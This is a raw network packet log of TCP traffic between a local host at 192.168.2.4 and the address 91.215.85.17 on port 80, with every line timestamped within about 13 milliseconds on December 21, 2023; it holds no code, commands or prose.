                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942373991 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942411900 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942460060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942570925 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942610025 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942656994 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942692041 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942749023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942876101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942918062 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942941904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942989111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943026066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943078041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943140984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943245888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943288088 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943291903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943350077 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943387985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943434000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943469048 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943506002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943546057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943583012 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943605900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943650007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943689108 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943758011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943928003 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943939924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.943978071 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944025993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944039106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944072962 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944185972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944200993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944225073 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944272041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944380045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944415092 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944454908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944479942 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944519043 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944566011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944603920 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944643974 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944732904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944776058 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944791079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944916010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.944955111 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945003033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945180893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945270061 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945311069 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945388079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945477009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945519924 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945528030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945564985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945565939 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945703030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.945744038 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946063042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946075916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946114063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946162939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946332932 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946449041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946491003 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946518898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946537971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946574926 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946621895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946660995 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946712971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946861029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946877003 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.946901083 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947032928 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947046041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947077990 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947082996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947127104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947166920 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947185993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947223902 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947263002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947310925 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947350979 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947397947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947509050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947521925 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947550058 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947581053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947616100 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947783947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947865009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947906971 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947947025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.947985888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948019028 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948062897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948108912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948194027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948234081 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948293924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948466063 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948477983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948506117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948518038 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948662043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948674917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948695898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948726892 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948759079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948834896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948873997 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948925018 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.948987961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949014902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949029922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949048996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949083090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949223042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949263096 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949273109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949361086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949400902 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949444056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949542999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949613094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949655056 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949697971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949862003 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949875116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949903965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949919939 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949943066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.949984074 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950069904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950110912 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950112104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950211048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950222969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950251102 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950263023 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950325966 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950397968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950453043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950494051 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950599909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950685978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950725079 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950756073 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950795889 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950815916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950948954 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.950992107 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951021910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951054096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951096058 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951114893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951209068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951242924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951283932 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951339960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951410055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951447964 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951503992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951544046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951591015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951662064 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951702118 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951742887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951761961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951802969 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951853037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.951958895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952003002 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952014923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952187061 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952227116 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952290058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952393055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952430010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952442884 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952492952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952590942 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952606916 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952668905 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952729940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952769995 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952800989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952815056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952853918 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.952877045 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953125954 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953182936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953309059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953399897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953402996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953480005 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953541994 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953634977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953644991 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953675032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953707933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953723907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953738928 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953763962 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953803062 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953911066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953931093 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953989029 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.953989983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954029083 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954063892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954107046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954144955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954199076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954243898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954243898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954267979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954310894 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954364061 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954416990 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954473019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954507113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954529047 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954529047 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954541922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954586983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954624891 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954652071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954684019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954716921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954721928 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954804897 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954837084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954902887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954931974 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.954969883 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955024004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955097914 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955106020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955151081 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955177069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955214977 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955276012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955341101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955378056 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.955427885 CET4973880192.168.2.491.215.85.17
